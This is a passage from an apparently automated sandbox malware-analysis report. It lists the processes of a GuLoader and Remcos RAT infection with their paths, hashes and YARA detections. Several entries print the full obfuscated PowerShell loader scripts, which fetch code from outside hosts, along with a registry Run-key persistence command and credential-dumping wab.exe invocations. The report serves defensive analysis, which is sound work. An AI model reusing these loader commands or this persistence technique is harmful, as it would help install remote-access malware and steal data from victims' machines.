Br.aHjrerDeraeTekstLinstGymneForerPseusG.rd)Glg, ');while (!$Takstgrnserne) {Regulerbare (Teucrium 'Navn$ Exag C.al BoroB,gnbOveraUn cl B s:Th rMSkome U,sjIngreCi.ft.ptarSpors S ukNaileOleirSejrnButaeTrussSkls= Fje$Birkt AllrT.uduOp heTh,o ') ;Regulerbare $Republicanisms;Regulerbare (Teucrium 'SnydSLenit BroaAfr rBundtR.ac- MavSTy,ol iseIndfeafskp af Ento4 Exo ');Regulerbare (Teucrium 'Anal$AnargStralSemioB,isbGen aAfdrlSemi:FdreTInt.aNedrkGru.sTinst UnfgPidgrPolynSkr sLivse .rorLadenFarmeDiam= App(chanTsitueBrofsBisttLyss-DispPHoloaWhitt ClihTha, Femr$ .erFHense.ormlBed,t GanlNovaaManuzUdbeabivurUbele DjitEpiltechiePnser acsSkjo) B n ') ;Regulerbare (Teucrium 'H,rn$Blyag,arblD troS.edb Stia MinlNonf:InfoIBah nBlougFrdee Avin.looiAnnirFun,f epi DetrOmvlmHjemaunlieSkatrSkygsUnsi= ,ur$AdfrgUhenlLoq o KrlbKr,ga,eamlDelt:AcetP leplKi ka B,ad BauaVollr BozoMet mLageaCani+Chry+ .al%Arki$Sem T Fusa EmbaE.sklReasmMut.oThord .uli DatgSpith,aadeReakd Swi. Elec,andoUnswuGlucnSil.tHe,t ') ;$Ovariectomize=$Taalmodighed[$Ingenirfirmaers];}Regulerbare (Teucrium '.orf$,tedgHvall Ov,oBranbTrakaka fl Rat: DorRove aGenelsp,npTr.shUnst To,d= lan Dia,GDiskeMatitDebi-CionCEfteo brunAuditlsble Mu,n Sastalde Mas$ PerFHyoee BielSelvtclitlMimiaTelezA,tiaEns,r ,teeSobbtAurotF rleSuperMasosLysd ');Regulerbare (Teucrium 'grns$TissgFolklF buoOverbG nsa ejalS.in:Ce tM Si,eRottt NonaAntilFootbTheae AlcaKlimrTruniPurgnLitogRae Gene=Vivi re,o[ Tr SChilyDybtsPal.tBruseAfprmHuma.HutcCRetsoDonanR miv UddeSubtrApp tCh c]V lk: Kvi:etamFBillrUl.roSjusmOilsBStataL.mpsPoteeStud6Saml4ErhvS P,ltSterrIl,kiAse,nUnpagTret(Es h$GeolR GreaMultlDiskpLuerhs,ig)Ofre ');Regulerbare (Teucrium 'A pa$LedegParalexcro UnrbInveaR gslHigh:FangRPilsa WittSameiTilfoStasnVarieAfler phon ag eRo ss Tri Diso=Pene Pa [KrafSBa syBaldsStuctKon.eTrolm tab.Sam TEnt e.remx .attSupe. dklEPoinnDrejcKn.vo Ko,d ChaiCessnP.rag,ult]Im,o:Pasf:PartAforgS F,rCCapeI,oteIGl.d.RekyG .heeC phtha.dS Ru,tB.ndrPi,iiPectn .leg Uns( onu$AtomM ,oeeKon tMul,aIllulBehabPom,eLeksa.nanrPerpiUnshnForegDybf)P.ak ');Regulerbare (Teucrium 'Nod $ UdjgembrlMineoSt.mbM loaTelelkont:Ar,hFRe veSyslrD.lmrGiobiFoerm ParaDisegSkotn At e BiatPs,uiPlyic Tak=R ma$BasiR,oraatekntParcibl,noH emnFa.ie BesrantinKrepeMikssgrun. ac.sN.npu .tebSodasPirotBrnerSkreiBygenRattgDimi(Magu3S lp2Step0Gros2 Maj5Anis7 at, haa2St.g8 Pol9Omgi8Amer1Gear)Bl c ');Regulerbare $Ferrimagnetic;"
                                              Imagebase:0x7ff7be880000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2692569252.00000214A36AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:07:39:51
                                              Start date:26/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:07:39:54
                                              Start date:26/04/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $"
                                              Imagebase:0x7ff6403e0000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:07:40:01
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeInfomUndeeUnd,rUnp,sGod,.SkraHIndpeAgerahided AlleTromrBvens Tep[Appl$Rri.iHoa,mDispp QuerhereoK mmvHjsleInd rAltesPaup]Conv=Trla$TromP vanlgubeaPerenRe slShrugSa vgUnqueHos,lBedss pseeConsr AutnItereslie2 Vre3Utop5 Bea ');$Republicanisms=Teucrium 'ResiDDe fr yniPosefStymt S ysShampFathr Traocardb SmdlPhote AcymOrdfe Ar,rMonosS ar.LndeDBrano H jw tilnKaoll ,igoAfpraTho dMiniFrykki upelDd.deAnal(Sult$St,cOPeriv SpaaAntarUly iScapePicncBedetRadio NonmBigaiPseuzTrkve Afg,Unbl$FlygFRet,eFri.lUnsptAlmelU.etaLet.zRefraAcourAduneDeput onetU,rue PrgrpergsNor.)lith ';$Republicanisms=$subinsertion[1]+$Republicanisms;$Feltlazaretters=$subinsertion[0];Regulerbare (Teucrium 'Symp$dhurg HonlS,lvoMultbOldfaUdmal ,ns:in.tT Hala StrkInhas,ntrtundegUn drFor nShidsKateeSpirrP.emnConveIzvo= lue(S udT AfkeIngrsSweatSoen-SynfPUd.ra LabtUsaahMowt Sang$StorF T neAtoml .oatShovlBlesaAbalz Br.aHjrerDeraeTekstLinstGymneForerPseusG.rd)Glg, ');while (!$Takstgrnserne) {Regulerbare (Teucrium 'Navn$ Exag C.al BoroB,gnbOveraUn cl B s:Th rMSkome U,sjIngreCi.ft.ptarSpors S ukNaileOleirSejrnButaeTrussSkls= Fje$Birkt AllrT.uduOp heTh,o ') ;Regulerbare $Republicanisms;Regulerbare (Teucrium 'SnydSLenit BroaAfr rBundtR.ac- MavSTy,ol iseIndfeafskp af Ento4 Exo ');Regulerbare (Teucrium 'Anal$AnargStralSemioB,isbGen aAfdrlSemi:FdreTInt.aNedrkGru.sTinst UnfgPidgrPolynSkr sLivse .rorLadenFarmeDiam= App(chanTsitueBrofsBisttLyss-DispPHoloaWhitt ClihTha, Femr$ .erFHense.ormlBed,t GanlNovaaManuzUdbeabivurUbele DjitEpiltechiePnser acsSkjo) B n ') ;Regulerbare (Teucrium 'H,rn$Blyag,arblD troS.edb Stia MinlNonf:InfoIBah nBlougFrdee Avin.looiAnnirFun,f epi DetrOmvlmHjemaunlieSkatrSkygsUnsi= ,ur$AdfrgUhenlLoq o KrlbKr,ga,eamlDelt:AcetP leplKi ka B,ad BauaVollr BozoMet mLageaCani+Chry+ .al%Arki$Sem T Fusa EmbaE.sklReasmMut.oThord .uli DatgSpith,aadeReakd Swi. Elec,andoUnswuGlucnSil.tHe,t ') ;$Ovariectomize=$Taalmodighed[$Ingenirfirmaers];}Regulerbare (Teucrium '.orf$,tedgHvall Ov,oBranbTrakaka fl Rat: DorRove aGenelsp,npTr.shUnst To,d= lan Dia,GDiskeMatitDebi-CionCEfteo brunAuditlsble Mu,n Sastalde Mas$ PerFHyoee BielSelvtclitlMimiaTelezA,tiaEns,r ,teeSobbtAurotF rleSuperMasosLysd ');Regulerbare (Teucrium 'grns$TissgFolklF buoOverbG nsa ejalS.in:Ce tM Si,eRottt NonaAntilFootbTheae AlcaKlimrTruniPurgnLitogRae Gene=Vivi re,o[ Tr SChilyDybtsPal.tBruseAfprmHuma.HutcCRetsoDonanR miv UddeSubtrApp tCh c]V lk: Kvi:etamFBillrUl.roSjusmOilsBStataL.mpsPoteeStud6Saml4ErhvS P,ltSterrIl,kiAse,nUnpagTret(Es h$GeolR GreaMultlDiskpLuerhs,ig)Ofre ');Regulerbare (Teucrium 'A pa$LedegParalexcro UnrbInveaR gslHigh:FangRPilsa WittSameiTilfoStasnVarieAfler phon ag eRo ss Tri Diso=Pene Pa [KrafSBa syBaldsStuctKon.eTrolm tab.Sam TEnt e.remx .attSupe. dklEPoinnDrejcKn.vo Ko,d ChaiCessnP.rag,ult]Im,o:Pasf:PartAforgS F,rCCapeI,oteIGl.d.RekyG .heeC phtha.dS Ru,tB.ndrPi,iiPectn .leg Uns( onu$AtomM ,oeeKon tMul,aIllulBehabPom,eLeksa.nanrPerpiUnshnForegDybf)P.ak ');Regulerbare (Teucrium 'Nod $ UdjgembrlMineoSt.mbM loaTelelkont:Ar,hFRe veSyslrD.lmrGiobiFoerm ParaDisegSkotn At e BiatPs,uiPlyic Tak=R ma$BasiR,oraatekntParcibl,noH emnFa.ie BesrantinKrepeMikssgrun. ac.sN.npu .tebSodasPirotBrnerSkreiBygenRattgDimi(Magu3S lp2Step0Gros2 Maj5Anis7 at, haa2St.g8 Pol9Omgi8Amer1Gear)Bl c ');Regulerbare $Ferrimagnetic;"
                                              Imagebase:0xfe0000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2490726122.0000000008980000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2461742751.0000000005DFF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2491020170.000000000A67A000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:07:40:02
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $"
                                              Imagebase:0x790000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:07:40:24
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                              Imagebase:0x260000
                                              File size:516'608 bytes
                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:moderate
                                              Has exited:false

                                              General

                                              Target ID:9
                                              Start time:07:40:33
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)"
                                              Imagebase:0x790000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:07:40:33
                                              Start date:26/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:07:40:33
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\reg.exe
                                              Wow64 process (32bit):true
                                              Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)"
                                              Imagebase:0x560000
                                              File size:59'392 bytes
                                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:13
                                              Start time:07:40:41
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\wscript.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs"
                                              Imagebase:0x6c0000
                                              File size:147'456 bytes
                                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:14
                                              Start time:07:40:42
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jettes (Circumflexes ' Hic$DefiSGoo k.orteTranpNulvtgummi,nfrcO,dy. skrHUn ieAa aa PerdSp,reBillrJordsB.am[Frug$FormOSuttpFidutLnsird nkiGiggnBlansfeer4I da5Over]Korv=Reig$di,kS StuiUhelmInseuKnsklLeattu,spadur.nQuadsEmulc CykeSlavn H pe Regr fkosUdry ');$Isoln=Circumflexes ' .meS,ondkSka eSemipUndetSpgeiP,nccAver.Mer.DAnomoP stw.deanthrolov roFarta N,ddSt dFAssui Krel Bd,eUntr(Ove,$OmsoLScarePerevDyreeflyvmJi buStorl Kkki PergWarnh ikleFuldd .dr,Gfor$.aktHEpisvPriniHarerSexuv PholBll e Pros ya)un.h ';$Isoln=$Forankringspunktets[1]+$Isoln;$Hvirvles=$Forankringspunktets[0];Jettes (Circumflexes ' Sh $Eft gPounlFromoUfatb iea S,ilUnc,:CasuPFlanuStjdnVaskc B.otRighuU.tis Sor=hu,t(SculTCorreOutks Th,tReal-SyttP avaRingt Tr hThru Modt$GlauH.elfvForkiTensrr.prvMowelLaise Pe.s eat) Tyn ');while (!$Punctus) {Jettes (Circumflexes 'Unpr$B.blgPolylPorto Ba.bKampaAzidlPaal:MonomUdslaharorCanacBdeaeBr.nsSupecSubreSretn ThocTor.eDat,=Macr$.xtrtOverrBobbuNonseHnge ') ;Jettes $Isoln;Jettes (Circumflexes ' MinSKu.ttPensaOverr ynetMatr-PromSMin lThimeCosteSkndpSkva npa4,esp ');Jettes (Circumflexes 'Ufor$ SilgKat.lLiquochokbBrnda Trol kur:SnowPPostuAndenAnlgcAf.utSk.duAffesOver=Bram( afgT DrieRemisOwentFelt- UdfPBlomaD,fftRe,vhNd.i Frad$ ollH Tipv ProiHyd rUp.av ForlBefoeProjsHjes)Sewm ') ;Jettes (Circumflexes 'Coin$ OrngWaftlB.reo veb Scoa AttlQuis:.axiVDekroAggrl Spol s.ae ParyJingbResuaAlcolDamplVo,dsBlr,=Skub$ProtgRufflserooR.cibLe ea MenlAr,o: O.eMEmmeaTommgForriUdbrkK.sse,kkor.trinAksge aars.jem+Inst+ T l%Prom$BecrAVarsl UdtvShoreHvo,oLeavlTrieiCrybtAcceeTveds Jvn.LeptcMetaoRegou eren,amnt .is ') ;$Levemulighed=$Alveolites[$Volleyballs];}Jettes (Circumflexes 'Anon$ LiggAsenlUnchoOph.bPalaa utilSubm:TndeHCyatoConcvNonoeDelidApoksBruntStemrHermuCou,kringtr thuRingrUheleSrstrBiocnSla.e,refsTil, D.st=Matr Di,GAmate galtBesk-DissCNon.oCournPartt FoueUf.dnM,wstCamb Vi.r$VatiHkapevHydri LetrStatvA,allSpaaeCocos Hae ');Jettes (Circumflexes 'Tenn$ JusgPorzl HolochacbUnp aB,vrl Uar:chawAPostbOpgrjModeuScordForgi.yrec andaOvert,tereHern Diss= sta Ciga[flagSHoveyAfghsJesut Sube ConmTool. VrdCSingoForfn Myov,rlleOthir s.itUnva]Astr:Kont:BeviFsamorCarroPlanmliftBanh aTil,sC.rreDown6arbe4UnfrSA.altFestr Veji Civn,tilg,onr(Fors$KnskH PeroPrebv.oule StadForusWrestPerirs.etuser k TaltEkstuDecarPumpeHyper Ne.n H,le Mims Uds)Br.c ');Jettes (Circumflexes ',eta$O elgEr,vl BenoskrmbmesoaMalllAlon:bifiLS.tivA.glhAstry ObetModetud.meSk,lr KlonEmboeSupe Ungd=Stil prie[ChurS isey kovsInittEl ve HucmGram. In,TBazoeKonsxRu,gtSk,a. VogE,ekanhempc ,oso MatdStn,iDrifnSa mgAdmi] Pej: La : MasAInskSStriC Ud,I ComIInda.UnreGVarieTeatt .ilSSmeltPaver U.fiMyrenManggAgna(Dekl$GuidA.omabOrdrjFreiu .tad,onhiUnfacIndka KabtRelaeGoom) U,l ');Jettes (Circumflexes 'Semi$Par,gNongl SupoB,rebBe raGrsrlF.ld:Res,SMultk Foli fugkU,sak GeneBol,lAcets frueconjnSm.tsR bb=luge$NotaL ,gev,aglh UngyMam.tFarvtPayoeSatirSisynKom,e ,ke.Ka,as.onbuDeutb KoesBorutSeksrEli iTelenMyopgtra,(Ser,3Faul1O.om4Efte7 lot8Unwa4 Fr.,Forb2 .lo6 Mid3Ba o0.arv2Mis )Coup ');Jettes $Skikkelsens;"
                                              Imagebase:0xfe0000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000E.00000002.3250010228.0000000005A14000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:15
                                              Start time:07:40:42
                                              Start date:26/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:16
                                              Start time:07:40:43
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\eeubmxzcykpvacklrogamlalknwo"
                                              Imagebase:0x260000
                                              File size:516'608 bytes
                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:17
                                              Start time:07:40:43
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"
                                              Imagebase:0x260000
                                              File size:516'608 bytes
                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:18
                                              Start time:07:40:43
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"
                                              Imagebase:0x260000
                                              File size:516'608 bytes
                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

